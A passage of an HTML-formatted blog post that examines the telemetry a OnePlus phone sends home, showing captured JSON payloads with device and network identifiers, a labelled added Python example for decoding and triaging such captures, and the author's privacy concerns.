            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;258cfeb1&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;en&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;abnormal_reboot&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ts&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484178427035&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;oed&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[],&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;it&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;rv&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;OnePlus2Oxygen_14.A.27_GLO_027_1612271635&quot;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
        &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;},&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;err&quot;&gt;...&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
    &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;OK, so it looks like they’re collecting timestamped metrics on certain events (the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ts&lt;/code&gt; field is the event time in milliseconds since the Unix epoch, which we’ll be seeing more of). Some of these I understand: from a development point of view, wanting to know about abnormal reboots seems legitimate. The screen on/off and unlock activities, though, feel excessive.
At least these are anonymised, right? Well, not really: taking a closer look at the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;id&lt;/code&gt; field, it seems familiar; this is my phone’s serial number.
This I’m less enthusiastic about, as it can be used by OnePlus to tie these events back to me personally (but only because I bought the handset directly from them, I suppose).&lt;/p&gt;
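&lt;p&gt;As an added example (not from the original post), a small Python decoder for the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/cloud/pushdata/&lt;/code&gt; body: it rebuilds the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;access_token&lt;/code&gt; plus Base64 &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;data&lt;/code&gt; form body from a constructed event batch, decodes it back, turns &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ts&lt;/code&gt; into UTC timestamps, and scans string values for IMEI, MAC-address and phone-number shapes so a capture can be triaged without reading every field by hand. The sample payloads mirror the structure on this page with placeholder identifiers, and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;encode_pushdata&lt;/code&gt;/&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;decode_pushdata&lt;/code&gt; are this example’s names, not the app’s.&lt;/p&gt;

```python
import base64
import json
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlencode

# Constructed sample payloads mirroring the structure seen in the proxied traffic
# (ty/dl/id/en/ts plus device-info fields). Token, serial, IMEIs, MAC and numbers are placeholders.
EVENT_BATCH = {"ty": 3, "dl": [
    {"id": "258cfeb1", "en": "screen_off", "ts": 1484177517017, "oed": [], "it": 0,
     "rv": "OnePlus2Oxygen_14.A.27_GLO_027_1612271635"},
    {"id": "258cfeb1", "en": "unlock", "ts": 1484177827961, "oed": [], "it": 0,
     "rv": "OnePlus2Oxygen_14.A.27_GLO_027_1612271635"},
]}
DEVICE_INFO = {"ty": 1, "dl": [
    {"id": "258cfeb1", "im": "123456789012345,987654321098765", "ma": "aa:bb:cc:dd:ee:ff",
     "npn": "07123456789,07987654321", "nws": "\"CHRISDCMOORE\"",
     "ov": "Oxygen ONE A2003_24_161227"},
]}


def encode_pushdata(payload: dict, access_token: str = "EXAMPLE_TOKEN") -> str:
    """Build the form body the phone posts: access_token plus Base64-encoded JSON."""
    data = base64.b64encode(json.dumps(payload, separators=(",", ":")).encode()).decode()
    return urlencode({"access_token": access_token, "data": data})


def decode_pushdata(body: str) -> dict:
    """Reverse it: pull 'data' out of the form body, pad, Base64-decode and parse the JSON."""
    raw = parse_qs(body, strict_parsing=True)["data"][0]
    return json.loads(base64.b64decode(raw + "=" * (-len(raw) % 4)))


def ms_to_iso(ts_ms: int) -> str:
    """'ts' is milliseconds since the Unix epoch; integer arithmetic avoids float rounding."""
    return (datetime.fromtimestamp(ts_ms // 1000, tz=timezone.utc)
            + timedelta(milliseconds=ts_ms % 1000)).isoformat()


def timeline(payload: dict) -> list:
    """(time, device id, event name) for every event in a type-3 batch."""
    return [(ms_to_iso(e["ts"]), e["id"], e["en"]) for e in payload.get("dl", [])]


# Value shapes worth flagging when triaging a capture: IMEI, MAC address, UK-style number.
_IDENTIFIER_PATTERNS = {
    "imei": re.compile(r"^\d{15}$"),
    "mac": re.compile(r"^(?:[0-9a-f]{2}:){5}[0-9a-f]{2}$", re.IGNORECASE),
    "phone": re.compile(r"^0\d{10}$"),
}


def find_identifiers(payload) -> dict:
    """Walk the JSON and collect string values (or comma-separated items, as the app packs
    them) that look like hardware or subscriber identifiers."""
    found = {kind: set() for kind in _IDENTIFIER_PATTERNS}

    def walk(node):
        if isinstance(node, dict):
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for value in node:
                walk(value)
        elif isinstance(node, str):
            for item in node.split(","):
                for kind, pattern in _IDENTIFIER_PATTERNS.items():
                    if pattern.match(item):
                        found[kind].add(item)

    walk(payload)
    return {kind: sorted(values) for kind, values in found.items()}
```

&lt;p&gt;Run against a real capture, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;find_identifiers&lt;/code&gt; gives a quick yes/no on whether a batch carries device or subscriber identifiers, and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;timeline&lt;/code&gt; shows how fine-grained the behavioural record is.&lt;/p&gt;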

&lt;p&gt;I leave the traffic proxied for some time, to see what other information is collected, and boy am I in for a shock…&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-json&quot; data-lang=&quot;json&quot;&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
    &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ty&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
    &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;dl&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
        &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ac&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;av&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;6.0.1&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;bl&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;82&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;br&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;OnePlus&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;bs&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;CHARGING&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;co&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;GB&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ga&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;11511&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;gc&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;234&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ge&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;6759424&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;gn&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;30&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;iac&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;258cfeb1&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;im&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;123456789012345,987654321098765&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;imei1&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;123456789012345&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;it&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;la&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;en&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;log&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ma&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;aa:bb:cc:dd:ee:ff&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;mdmv&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;1.06.160427&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;mn&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;ONE A2003&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;nci&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;23430,&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ncn&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;,&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;noi&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;23430,&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;non&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;EE,&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;not&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;LTE,&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;npc&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;gb,&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;npn&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;07123456789,07987654321&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;nwa&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;aa:bb:cc:dd:ee:ff&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;nwb&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;ff:ee:dd:cc:bb:aa&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;nwh&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;kc&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;nwl&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;nws&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;CHRISDCMOORE&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ov&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;Oxygen ONE A2003_24_161227&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pcba&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;rh&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1920&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ro&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;kc&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;romv&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;3.5.6&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;rw&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1080&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;sov&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;A.27&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ts&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484487017633&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;tz&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;GMT+0000&quot;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
        &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
    &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;Amongst other things, this time we have the phone’s IMEI(s), phone numbers, MAC addresses, mobile network name(s) and IMSI prefixes, as well as my wireless network ESSID and BSSID and, of course, the phone’s serial number.
Wow, that’s quite a bit of information about my device, even more of which can be tied directly back to me by OnePlus and other entities.&lt;/p&gt;

&lt;p&gt;It gets worse.&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-json&quot; data-lang=&quot;json&quot;&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
    &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ty&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
    &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;dl&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[{&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;258cfeb1&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pn&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;com.Slack20003701&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pvc&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;20003701&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;tk&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
                &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484079940460&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484079952177&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;],&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
